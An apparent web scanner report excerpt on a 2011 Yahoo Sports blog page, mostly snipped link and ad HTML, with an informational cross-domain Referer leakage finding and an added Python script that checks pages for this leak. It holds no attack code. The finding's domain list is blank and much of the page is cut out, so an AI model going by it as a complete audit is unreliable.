<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/blog/big_league_stew/post/Wedgie-Foul-ball-sticks-in-mask-of-Mariners-cat?urn=mlb-wp18471&active_dimension=carousel_coke_today&ysp_frm_woah=1" title="Foul ball's funny landing place">
<img src="http://l.yimg.com/iu/api/res/1.2/L_C_0HS.bC_7fqRT3udDuw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/stuck.jpg" title="Foul ball's funny landing place" alt="Foul ball's funny landing place" width="94" height="63">
</a>
...[SNIP]...
ost/32-keys-to-the-NFL-8217-s-2011-season-Part-II-?urn=nfl-wp6499&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part II)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/post/32-keys-to-the-NFL-8217-s-2011-season-Part-I-?urn=nfl-wp6496&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part I)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Colbert-found-his-way-back-onto-a?urn=nfl-wp6492&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Somehow, Keary Colbert found his way back onto an NFL roster">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-committed-to-non-committal-on-Qu?urn=nfl-wp6489&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Broncos are committed to non-committal on Quinn vs. Tebow">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Brothers-it-isn-8217-t-about-the-?urn=nfl-wp6481&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="For the Ryan Brothers, it isn...t about the laughs right now">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
g/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
down-Corner-Week-1-Preview-Podcast-Greg?urn=nfl-wp6458&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Week 1 Preview Podcast: Greg Cosell">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-s-employment-until-sev?urn=nfl-wp6446&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Colts delay Tressel...s employment until seventh week of regular season">
<img src="http://l.yimg.com/iu/api/res/1.2/tcsbrnHu2XoIp0S0.Ckzsw--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/tressel-pd.jpg" title="Colts delay Tressel...s employment until seventh week of regular season" alt="Colts delay Tressel...s employment until seventh week of regular season" width="94" height="63">
</a>
...[SNIP]...
it-looks-like-Manning-8217-s-str?urn=nfl-wp6439&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="More and more, it looks like Manning...s streak is in jeopardy">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
aneers-Hall-of-Famer-Lee-Roy-Selmo?urn=nfl-wp6433&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Tampa Bay Buccaneers Hall of Famer Lee Roy Selmon dies at 56">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
log/shutdown_corner/post/Aaron-Rodgers-8217-handlebar-mustache-gives-hi?urn=nfl-wp6423&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="QB's impressive 'stache">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
_corner/post/Former-Pats-safety-Brandon-Meriweather-leads-lis?urn=nfl-wp6406&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Prominent NFL players on the move">
<img src="http://l.yimg.com/iu/api/res/1.2/PXuMXOwJ2uaXo5fYsMtxbQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/04/cuts.jpg" title="Prominent NFL players on the move" alt="Prominent NFL players on the move" width="94" height="63">
</a>
...[SNIP]...
rudge-might-8216?urn=nfl-wp6399&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Troy Aikman still carries a grudge, might ...get physical... with Skip Bayless">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-mean-more-to-Packers-LB-Vic-So-?urn=nfl-wp6392&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Preseason could mean more to Packers LB Vic So...oto than most">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
wn_corner/post/The-Shutdown-Corner-Podcast-Mike-Silver?urn=nfl-wp6388&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Podcast: Mike Silver">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
back-8?urn=nfl-wp6382&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Haynesworth would ...give that money back... to have played for Pats instead of Redskins">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
orner/post/Colts-hire-Jim-Tressel-as-8216-gameday-consult?urn=nfl-wp6368&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Ousted Ohio State coach lands NFL job">
<img src="http://l.yimg.com/iu/api/res/1.2/h_zLXLqXGLxqtLROuGO0hQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/02/tressel.jpg" title="Ousted Ohio State coach lands NFL job" alt="Ousted Ohio State coach lands NFL job" width="94" height="63">
</a>
...[SNIP]...
corner/post/Video-Theismann-windily-calls-out-Redskins-retur?urn=nfl-wp6337&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="'Stupid' play infuriates announcer">
<img src="http://l.yimg.com/iu/api/res/1.2/CFHAgrHng88MCICCWPs.Ag--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/08/12/banks-pd.jpg" title="'Stupid' play infuriates announcer" alt="'Stupid' play infuriates announcer" width="94" height="63">
</a>
...[SNIP]...
-has-an-art-gallery-and-somebody-br?urn=nfl-wp6331&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Chris Cooley has an art gallery, and somebody broke into it">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
n_corner/post/A-week-before-the-season-Lance-Briggs-asks-to-b?urn=nfl-wp6329&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="NFL player's poorly timed request">
<img src="http://l.yimg.com/iu/api/res/1.2/4SGMPg8hKSC75E289QQ3XQ--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/ww/news/2011/09/02/briggs.jpg" title="NFL player's poorly timed request" alt="NFL player's poorly timed request" width="94" height="63">
</a>
...[SNIP]...
/shutdown_corner/post/Newton-causes-Bo-Jackson-to-wax-rhapsodic-gets-?urn=nfl-wp6323&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Bo Jackson praises rookie">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
g/shutdown_corner/post/Dez-Bryant-is-now-living-life-on-the-straight-an?urn=nfl-wp6320&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Dez Bryant's turnaround">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ccaneerss-WR-Mike-Williams-guarantees-playoffs?urn=nfl-wp6314&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Buccaneerss WR Mike Williams guarantees playoffs">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
down_corner/post/The-Shutdown-Corner-Podcast-Rich-Eisen?urn=nfl-wp6310&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="The Shutdown Corner Podcast: Rich Eisen">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
yan-compares-Michele-Bachmann-to-Terrell-?urn=nfl-wp6302&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="Jon Runyan compares Michele Bachmann to Terrell Owens">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
r/post/And-now-an-MRI-of-Braylon-Edwards-8217-hands?urn=nfl-wp6294&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="And now, an MRI of Braylon Edwards... hands">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
n_corner/post/Jerry-Jones-might-have-talked-himself-out-of-a-b?urn=nfl-wp6283&active_dimension=carousel_ept_sports_nfl_experts&ysp_frm_woah=1" title="NFL owner's joke could be costly">
<img src="http://l.yimg.com/iu/api/res/1.2/znW.5ZhfWEz4FHFcKOfAlA--/YXBwaWQ9eXZpZGVvO2NoPTE1NDtjcj0xO2N3PTIyOTtkeD04MjtkeT0xO2ZpPXVsY3JvcDtoPTYzO3E9MTAwO3c9OTQ-/http://l.yimg.com/a/i/us/i/ww/news/2011/09/01/jones.jpg" title="NFL owner's joke could be costly" alt="NFL owner's joke could be costly" width="94" height="63">
</a>
...[SNIP]...
sville-guard-Edgar-Sosa-suffers-gruesome-?urn=ncaab-wp4622&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Ex-Louisville guard Edgar Sosa suffers gruesome broken leg">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
217-s-departure-extends-Wake-Fore?urn=ncaab-wp4618&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="J.T. Terrell...s departure extends Wake Forest...s run of bad luck">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
of-Vancouver-blames-NHL-for-riots-embarras?urn=nhl-wp11913&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="City of Vancouver blames NHL for riots, embarrasses itself">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Wozniacki-lacks-many-things-fight-is-n?urn=ten-wp2976&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Caroline Wozniacki lacks many things, fight is not one of them">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
usted_racquet/post/U-S-Open-women-8217-s-quarterfinal-preview?urn=ten-wp2965&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="U.S. Open women...s quarterfinal preview">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
orner/post/32-keys-to-the-NFL-8217-s-2011-season-Part-II-?urn=nfl-wp6499&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part II)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
_corner/post/32-keys-to-the-NFL-8217-s-2011-season-Part-I-?urn=nfl-wp6496&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="32 keys to the NFL...s 2011 season (Part I)">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ideo-Witness-Andrew-Ference-8217-s-Stanley-Cu?urn=nhl-wp11900&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Video: Witness Andrew Ference...s Stanley Cup flash mob">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ers-GM-Holmgren-injured-in-8216-ser?urn=nhl-wp11901&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Report: Flyers GM Holmgren injured in ...serious... bike accident">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-s-new-helmets-are-even-m?urn=ncaaf-wp5948&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Somehow, Maryland...s new helmets are even more Maryland-y than we thought">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
oto-of-the-day-Jo-Wilfriend-Tsonga-eats-a-ten?urn=ten-wp2972&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Photo of the day: Jo-Wilfriend Tsonga eats a tennis ball">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
217-s-temper-costs-him-two-shots-a?urn=golf-wp5410&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Nick Watney...s temper costs him two shots as he cards 11 on par-5">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-Tsonga-on-court-during-argument-abo?urn=ten-wp2967&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Fish insults Tsonga on court during argument about player...s box">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
w-Keary-Colbert-found-his-way-back-onto-a?urn=nfl-wp6492&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Somehow, Keary Colbert found his way back onto an NFL roster">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
st/Breaking-news-American-golf-is-not-dead-after-a?urn=golf-wp5406&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Breaking news: American golf is not dead after all">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
The-Longest-Game-for-Cystic-Fibrosis-is-in-the-b?urn=nhl-wp11877&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="The Longest Game for Cystic Fibrosis is in the books">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
cos-are-committed-to-non-committal-on-Qu?urn=nfl-wp6489&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="The Broncos are committed to non-committal on Quinn vs. Tebow">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
/FedEx-Cupdate-Who-8217-s-headed-to-Chicago-for?urn=golf-wp5396&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="FedEx Cupdate: Who...s headed to Chicago for the BMW?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
day-Boise-State-uncovers-Georgia-?urn=ncaaf-wp5937&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Mid-Major Monday: Boise State uncovers Georgia...s pressure points">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
he-Ryan-Brothers-it-isn-8217-t-about-the-?urn=nfl-wp6481&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="For the Ryan Brothers, it isn...t about the laughs right now">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-coach-takes-mystery-flatulence-as-sign-?urn=sow-wp4670&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Flamengo coach takes mystery flatulence as sign of disrespect">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
Daddy-NHL-Season-Preview-2011-12-Carolina-?urn=nhl-wp11870&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Puck Daddy NHL Season Preview 2011-12: Carolina Hurricanes">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
or-Day-Marvin-Miller-Joe-Niekro-Nola?urn=mlb-wp18621&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Happy Labor Day! Marvin Miller, Joe Niekro, Nolan Ryan talk shop">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
aling-ahem-look-inside-KHL-cheerlea?urn=nhl-wp11867&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Video: Revealing, ahem, look inside KHL cheerleader dressing room">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
-that-Malbranque-retires-to-care-fo?urn=sow-wp4665&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Media reports that Malbranque retires to care for non-existent son">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
ey-8217-s-tough-guys-need-their-own-repr?urn=nhl-wp11832&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Do hockey...s tough guys need their own representative body?">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
nfl/blog/shutdown_corner/post/Shanahan-names-Rex-Grossman-Redskins-8217-Week?urn=nfl-wp6463&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Redskins name starting QB">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
eadlines-NHL-mental-health-debate-hockey?urn=nhl-wp11861&active_dimension=carousel_ept_sports_blog&ysp_frm_woah=1" title="Puck Headlines: NHL mental health debate; hockey wedding vid">
<img src="http://l.yimg.com/a/i/us/sp/ysp-mod/yahoo-article-thumb.png" alt="Yahoo! Sports"/>
</a>
...[SNIP]...
<a href="http://add.my.yahoo.com/rss?url=http://sports.yahoo.com/nfl/blog/shutdown_corner/rss.xml"><img src="http://l.yimg.com/a/i/us/my/addtomyyahoo4.gif" alt="Add to My Yahoo!" width="91" height="17" border="0"></a>
<a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/rss.xml"><img src="http://l.yimg.com/a/i/us/ext/rss4.gif" alt="RSS" width="17" height="17" border="0"></a>
...[SNIP]...
<a href="http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443" title="Tiki Barber remains unemployed and sad"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/09/ipt/1315235529.jpg" class="thumb" /></a>
...[SNIP]...
o ear hole. Wilson's perspective is a little different from most players because of his peculiar path to the NFL. He spent two years in jail on a murder charge before winning acquittal in July 2009."><img src="http://l.yimg.com/iu/api/res/1.2/BPKGQ0jdhpW3wZ1h2.sLAg--/YXBwaWQ9eXZpZGVvO2NoPTExNDtjcj0xO2N3PTExNDtkeD05O2R5PTE7Zmk9dWxjcm9wO2g9NzU7cT03MDt3PTc1/http://d.yimg.com/a/p/sp/ap/ef/thumbe.762be49a500597e37c663af513f03336/ap-201109051652607617151.jpg" width="75" height="75"></a>
...[SNIP]...
109051622589677032:1" title="Washington Redskins quarterback Rex Grossman warms up before an NFL preseason football game against the Tampa Bay Buccaneers in Landover, Md., on Thursday, Sept. 1, 2011."><img src="http://l.yimg.com/iu/api/res/1.2/kvW5ryKw33IEylfO4yeWWw--/YXBwaWQ9eXZpZGVvO2NoPTg3O2NyPTE7Y3c9ODc7ZHg9MTtkeT0xO2ZpPXVsY3JvcDtoPTc1O3E9NzA7dz03NQ--/http://d.yimg.com/a/p/sp/ap/5c/thumbe.33d686071b58a0e7f7c893610da085d5/ap-201109051622589677032.jpg" width="75" height="75"></a>
...[SNIP]...
the Washington Redskins in Indianapolis. Manning is doubtful for Sunday's season opener against the Texans as he continues to recover from neck surgery, putting his streak of 227 starts in jeopardy."><img src="http://l.yimg.com/iu/api/res/1.2/7AmHvSwfughfnOWbICRuaQ--/YXBwaWQ9eXZpZGVvO2NoPTEwMjtjcj0xO2N3PTEwMjtkeD0xO2R5PTE7Zmk9dWxjcm9wO2g9NzU7cT03MDt3PTc1/http://d.yimg.com/a/p/sp/ap/81/thumbe.69d59efaf75e1ded02d10de93c2dc147/ap-201109051559575906941.jpg" width="75" height="75"></a>
...[SNIP]...
<li><a href="http://www.footballoutsiders.com/" title="Football Outsiders">Football Outsiders <span>
...[SNIP]...
<li><a href="http://espn.go.com/blog/nflnation" title="Hashmarks">Hashmarks <span>
...[SNIP]...
<li><a href="http://kissmesuzy.blogspot.com/" title="Kissing Suzy Kolber">Kissing Suzy Kolber <span>
...[SNIP]...
<li><a href="http://beta.profootballtalk.com/category/rumor-mill/" title="Pro Football Talk">Pro Football Talk <span>
...[SNIP]...
<a href="http://us.lrd.yahoo.com/_ylt=Ar3rYXBPTB5YfC6vMuLwflDSrYZ4/SIG=123fvjdq3/EXP=1316522685/**http%3A//yahoosports.teamfanshop.com/NFL_Football" class="yspmore"><img src="http://l.yimg.com/a/p/sp/tools/med/2011/05/ipt/1305312565.jpg" alt="Shop for NFL Draft Gear!" title="Shop for NFL Draft Gear!"></a>
...[SNIP]...
<div id="n">
<IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=728 HEIGHT=90 SRC="http://ad.yieldmanager.com/st?_PVID=FZWRgGKIPE7pARpjTl.wjQCLMhd7ak5mFb0ACDiN&ad_type=iframe&ad_size=728x90&site=140509&section_code=14445127&cb=1315313085685551&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15jh2o74n/M=787833.14445127.14291894.22/D=sports/S=2022092242:N/_ylt=Aq9E8pK_YqzvgGRT6l1fMpDSrYZ4/Y=YAHOO/EXP=1315320285/L=FZWRgGKIPE7pARpjTl.wjQCLMhd7ak5mFb0ACDiN/B=10yaQmKJiSo-/J=1315313085685551/K=TVKeZm0ugXKNYFYgkLGeew/A=6261245/R=0/*"></IFRAME>
...[SNIP]...
</noscript> <img src="http://ads.bluelithium.com/pixel?id=372007&t=2" width="1" height="1" /><script language=javascript>
...[SNIP]...
</div>

<script type="text/javascript" src="http://l.yimg.com/zz/combo?d/lib/yui/2.9.0/build/yahoo/yahoo-min.js&d/lib/yui/2.9.0/build/event/event-min.js&d/lib/yui/2.9.0/build/dom/dom-min.js&d/lib/yui/2.9.0/build/imageloader/imageloader-min.js&d/lib/yui/2.9.0/build/get/get-min.js&d/lib/yui/2.9.0/build/connection/connection-min.js&d/lib/yui/2.9.0/build/animation/animation-min.js&d/lib/yui/2.9.0/build/json/json-min.js&d/lib/yui/2.9.0/build/container/container-min.js&d/lib/yui/2.9.0/build/element/element-min.js&d/lib/yui/2.9.0/build/cookie/cookie-min.js&d/lib/media/phugc/mwphcom_min_r142.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="http://l.yimg.com/j/assets/js/ult_bottom.r143221;js/teamtracker.r143221.js?m"></script>
...[SNIP]...
<!-- Yahoo! Web Analytics - All rights reserved -->
<script type="text/javascript" src="http://d.yimg.com/mi/ywa.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="http://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(1280131ab(gid$FZWRgGKIPE7pARpjTl.wjQCLMhd7ak5mFb0ACDiN,st$1315313085628168,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.99. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:
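
The finding above is the scanner's cross-domain Referer leakage check: the page was requested with a query string (urn=nfl-wp6443) and the response links to, or embeds resources from, other domains, so a browser that follows those links or fetches those resources may send the full request URL, query string included, in the Referer header. The script below is an added example, not code from the report, the scanner, or Yahoo; it reproduces that check over a response body and additionally looks for a Referrer-Policy header or meta tag (a mitigation that postdates this 2011 report) that would keep the query string from crossing origins. The request URL mirrors the finding; the HTML body and headers are constructed to resemble the snipped response and are not copied from it.

```python
"""Added example: reproduce the cross-domain Referer leakage check for an
HTML response, and report whether a Referrer-Policy would prevent the leak.
The sample URL, headers and HTML below are constructed for this example."""

from html.parser import HTMLParser
from urllib.parse import urlsplit, urljoin

# Attributes whose value the browser fetches or navigates to with a Referer.
URL_ATTRS = {
    "a": ("href",),
    "img": ("src",),
    "script": ("src",),
    "iframe": ("src",),
    "link": ("href",),
    "form": ("action",),
}

# Referrer-Policy values under which the path and query are never sent cross-origin.
SAFE_POLICIES = {
    "no-referrer", "origin", "origin-when-cross-origin", "same-origin",
    "strict-origin", "strict-origin-when-cross-origin",
}


class _LinkCollector(HTMLParser):
    """Collect URL-bearing attribute values and any <meta name=referrer>."""

    def __init__(self):
        super().__init__()
        self.urls = []
        self.meta_referrer = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)  # HTMLParser lowercases tag and attribute names
        for name in URL_ATTRS.get(tag, ()):
            if attrs.get(name):
                self.urls.append(attrs[name])
        if tag == "meta" and (attrs.get("name") or "").lower() == "referrer":
            self.meta_referrer = (attrs.get("content") or "").lower()


def cross_domain_links(page_url, html):
    """Return (sorted other-domain hosts linked or embedded, meta referrer policy)."""
    base_host = urlsplit(page_url).hostname
    collector = _LinkCollector()
    collector.feed(html)
    hosts = set()
    for raw in collector.urls:
        if raw.startswith(("javascript:", "mailto:", "#")):
            continue
        host = urlsplit(urljoin(page_url, raw)).hostname  # resolves relative and // URLs
        if host and host != base_host:
            hosts.add(host)
    return sorted(hosts), collector.meta_referrer


def referer_leakage(page_url, response_headers, html):
    """Report whether the request's query string can leak to third parties via Referer.

    The scanner's condition is: query string present AND cross-domain links present.
    A safe Referrer-Policy (header takes precedence over the meta tag) clears the finding.
    """
    query = urlsplit(page_url).query
    hosts, meta_policy = cross_domain_links(page_url, html)
    header_policy = {k.lower(): v for k, v in response_headers.items()}.get("referrer-policy", "")
    policy = (header_policy or meta_policy or "").strip().lower()
    leaks = bool(query) and bool(hosts) and policy not in SAFE_POLICIES
    return {"query": query, "hosts": hosts, "policy": policy, "leaks_query": leaks}


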